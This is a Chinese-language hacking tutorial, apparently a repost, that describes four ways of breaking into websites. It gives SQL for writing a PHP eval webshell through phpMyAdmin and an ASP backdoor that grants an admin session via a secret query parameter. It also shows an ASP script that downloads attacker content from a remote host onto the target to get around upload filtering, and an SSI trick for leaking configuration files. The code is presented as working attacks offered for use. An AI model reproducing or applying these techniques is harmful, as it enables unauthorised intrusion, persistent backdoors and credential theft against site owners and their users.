学习网上黑客

一、phpMyAdmin 后台拿webshell
 
1.如何拿到登陆密码. 自己想办法  
2.访问 : [url]http://url/phpmyadmin/libraries/sel[/url] ect_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果没什么意外.对应网站得到webshell
 
 
 
二、利用WEBSHELL直接进入后台
 
首先,我们要上传一个木马,通过下载数据库或者其他方法得到管理员的用户名。然后找到一个ASP文件,在其中的<%…………%>之间加上

dim id
id=trim(request("qwe"))
if id="120" then
session("AdminName")="管理员用户名"
end if

然后访问的时候在这个ASP文件后面加上?qwe=120

然后进入后台页面,是不是直接进去了?不用你输入用户名和口令了吧…………这里我们就少了一步(破解MD5密码)…………嗯,不错

三、突破一流信息监控系统实现文件“上传”
 
以前遇到过这种情况,今天看到就转过来了
在我们入侵网站的过程中,有时候提交我们的大马或者其它ASP文件的时候,会被一流信息监控系统所拦截,这是因为它设置了限制提交字符。
既然它不允许我们进行提交,那我们可以采用下载的方法。这个就好比我们上传大EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标 文件下载到本地服务器中。好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",[url]http://51CTO提醒您,请勿滥发广告!/ak.txt[/url],False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("ak.asp"),2
set sGet = nothing
set sPOST = nothing
%>
利用服务器的XML和数据流组件,从我的blog的ak.txt的内容下载到目标站点根目录并保存为ak.asp。
ak.txt中的内容当然就是被拦截的内容了。之后访问这个提交的ASP网页文件,会出现一片空白,然后我们再访问这个ak.asp文件,则想要上传的内容已经被保存成功!
 
 
当网站不允许上传asp cer cdx htr文件时
 
方法:上传一个stm文件, 内容为:<!--#include file="conn.asp"-->
直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦!
解析:<!--#include file="conn.asp"-->就是一条SSI指令,其作用是将"conn.asp"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示conn.asp其中的内容。
前提:服务器的对stm或者shtml的扩展没有删除!
后记:至于conn.asp可以为其他,比如config.inc.php config.aspx 等一些数据配置文件

你可能感兴趣的:(职场,黑客,休闲)